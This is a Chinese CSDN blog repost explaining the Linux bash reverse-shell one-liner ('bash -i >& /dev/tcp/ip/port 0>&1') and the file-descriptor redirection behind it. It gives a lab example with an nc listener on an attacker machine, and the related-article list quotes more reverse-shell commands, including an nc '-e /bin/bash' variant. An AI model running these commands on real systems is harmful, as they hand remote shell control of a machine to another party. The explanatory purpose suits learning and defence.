Linux反弹shell命令语句解析

最新推荐文章于 2022-09-07 16:38:46 发布
最新推荐文章于 2022-09-07 16:38:46 发布
阅读量811 收藏
点赞数
分类专栏: Web安全
Linux反弹shell命令语句
语句格式
bash -i >& /dev/tcp/[ip]/[port] 0>&1

  • bash -i 打开bash

  • &后面跟 /dev/tcp/[ip]/[port] (相当于>&后面接文件)将bash的标准输出和标准错误输出传递到远程,

  • /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

  • 0>&1将标准输入重定向至标准输出,由于标准输出定向至远程,标准输入也借此定向到远程。(由于标准错误输出也定向至远程,因此把 0>&1 改为 0>&2 也可以得到一个交互shell)

 例如:
 受害者:

Ubuntu Linux ------> 192.168.146.128

攻击者:

Kali Linux ------> 192.168.146.129

我们就以最常见的bash为例:
攻击者机器上执行:

nc -lvp 2333

受害者机器上执行:

bash -i >& /dev/tcp/192.168.146.129/2333 0>&1
文件描述符

有三种标准的文件描述符:

  • 0 - stdin 标准输入
  • 1 - stdout 标准输出
  • 2 - stderr 标准错误输出

还可以自己定义文件描述符,可以用于交换输出流。详见:https://unix.stackexchange.com/questions/42728/what-does-31-12-23-do-in-a-script?lq=1

>与>>

">"用于将标准输出重定向至文件。

ls -l > result.txt //结果将在文件中保存而不出现在bash中

">>“和”>"相比的区别在于:>是覆写文件而>>是追加文件。

&与&>

">&"根据后面的参数不同会有不同的结果。

当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符

一定注意:要使用>&来进行文件描述符的重定向

我看到很多博文中说>&和&>是一样的,但是查找不出来&>的相关资料,我认为应该是因为&>在一起并不像>&一样是一个标准的表达方式。

下面证明&>与>&并不相同
rm notExist.file1 > result.txt 2>&1
//结果将被保存在result.txt

rm notExist.file1 > result.txt 2&>1
//2与notExist.file1都被认为是要删除的文件
//结果保存在了一个文件1中

作者:jlu16
来源:CSDN
原文:https://blog.csdn.net/jlu16/article/details/78987990
版权声明:本文为博主原创文章,转载请附上博文链接!

Lee_Natuo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网隧道代理技术(七)之Bash反弹shell
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-25 714
Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
Bash Shell入门
03-23
linux bash shell学习 Shell基本语法: 1. Shell脚本的第一行中的符号“#!”用来指定解释执行该脚本文件的Shell程序。如果脚 本文件中缺少该行,在执行过程中,会报出错误信息。 2. Shell脚本完成后保存为*.sh,而后增加其可执行权限:chmod +x *.sh。 3. 反引号(~按键处)括起来的字符串被Shell解释为命令行。执行时首先执行该命令行,然后以命令行的输出结果替换反引号部分。 4. 输入重定向符“<”的作用是把命令的标准输入重新定向到指定文件;输出重定向符“>”的作用是把命令的标准输出重新定向到指定文件。输出附加定向符“>>”将命令的输出附加到指定文件的后面,而不破坏原有的内容。
带你读懂bash一句话反弹shell
qq_42303523的博客
02-22 1819
需要知道的linux知识 标准输入、标准输出、标准错误 在linux中输入一条命令会打开三个文件:标准输入、标准输出、标准错误。 在任何时候这个进程希望读取东西的时候都会从它的标准输入进行读取,在任何时候这个进程有输出的时候都会写入到标准输出,在任何时候这个进程有错误信息的时候都会写入到标准错误。 重定向 一般情况下,标准输入都是键盘,标准输出和标准错误都是显示器。 所谓的重定向,就是修改标准输入、标准输出、标准错误的读取或写入的对象。 常用的重定向操作符号有以下几个: 命令 说明 comm
详解反弹shell命令
shy的博客
04-11 3433
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势: bash -i >& /dev/tcp/ip/port 0>&1 bash -i本地打开一个bash >& 输出重定向,将标准输出和标准错误输出都重定向到远程。 /dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机...
linux反弹shell
Xi4or0uji
09-25 1882
最近做了几题都是反弹shell,总结一哈 bash bash -i &gt;&amp; /dev/tcp/vps_ip/端口号 0&gt;&amp;1 bash -i 生成一个交互式的子进程 &amp;表示在Linux后台运行 /dev/tcp/vps_ip/端口号 其实是与主机建立tcp连接 /dev/[tcp|upd]/host/port是Linux里面比较特殊的文件,读取和写入相...
反弹shell bash -i命令
m0_37638874的博客
09-07 3577
这只是bash实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入host port参数,就能发起一个socket连接。复制格式有num1&num2,区别是,前者是以只读的形式打开,后者是以写的形式打开,这里两者均可。Linux系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,,A先开启一个监听端口,让B去连接A的这个端口,连接成功后,A就能控制B了。是linux中的一个特殊设备,打开这个文件就相当于。
Linux常用命令
hangoer的博客
08-28 690
命令格式的说明 命令格式:命令 [-选项][参数] 参数 eg: [root@qianfeng01 ~]# ls -la /usr 说明: ⼤部分命令遵从该格式 多个选项时,可以⼀起写 eg: [root@qianfeng01 ~]# ls –l –a ls –la 简化选项与完整选项(注:并⾮所有选项都可使⽤完整选项) eg: [root@qianfeng01 ~]# ls –all ls –a 帮助命令:(相当于命令说明书) 帮助命令 man 英⽂:manual 命令路径:/usr/bin/man 执
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 8870
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
Linux反弹 shell 命令解析
守拙的博客
08-29 531
Linux 反弹 shell 命令 bash -i > /dev/tcp/192.168.139.149/4444 0>&1 各部分代表的意思。
命令执行漏洞
qq_42307546的博客
01-20 1437
命令执行漏洞也称为rce,当应用调用一些外部程序就会用到一些系统命令的函数,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行漏洞 相关函数 system(args)有回显 passthru(args)有c exec(args)回显最后一行-必须echo输出 shell_exec()无回显必须输出 代码分析 <?php /** * Created by runner.han * There is nothing new under the sun */
linux-shell脚本命令:grep命令简介
07-27
本文主要对linux-shell脚本命令中的grep命令进行简介,希望对您有所帮助。
Linux通过Shell脚本命令修改密码的两种方式
01-20
使用该命令会有提示,即进入了交互界面,输入密码即可。 使用脚本修改密码 很多时候我们可能需要远程执行服务器上的脚本来修改账号密码,此时就没有办法进行交互了。 此时可以使用如下两种方式修改密码: 方式1: ...
linux反弹shell的原理详解
01-08
反弹shell命令bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
利用CNN进行无人售货机的商品识别.zip
05-05
无人机最强算法源码,易于部署和学习交流使用
node-v9.11.0-sunos-x86.tar.xz
最新发布
05-05
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
ch-PP-OCRv2-det.onnx
05-05
PP-OCR det
基于TensorFlow的无人机机动飞行LSTM 时序动作网络.zip
05-05
无人机最强算法源码,易于部署和学习交流使用
ISO 16750-1-2023中文.pdf
05-05
ISO 16750-1-2023中文.pdf
Linux命令shell脚本语句的区别
07-27
Linux命令shell脚本语句是两种不同的概念。 Linux命令是在终端(命令行界面)下输入的一条指令,用于执行特定的操作。例如,"ls"命令用于列出当前目录下的文件和文件夹,"mkdir"命令用于创建新的目录。 而shell脚本语句是一系列的命令和控制结构(如条件判断、循环等)组成的文本文件。脚本语句可以包含多个命令,以实现更复杂的操作。脚本可以保存为一个文件,并通过执行该文件来运行其中的命令。 在shell脚本中,可以使用Linux命令来完成特定的任务。脚本语句可以包含变量、函数、条件判断和循环等控制结构,使得执行过程更加灵活和自动化。 总结来说,Linux命令是单独的指令,用于执行特定操作;而shell脚本语句是一系列命令和控制结构的组合,用于实现更复杂的操作逻辑。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值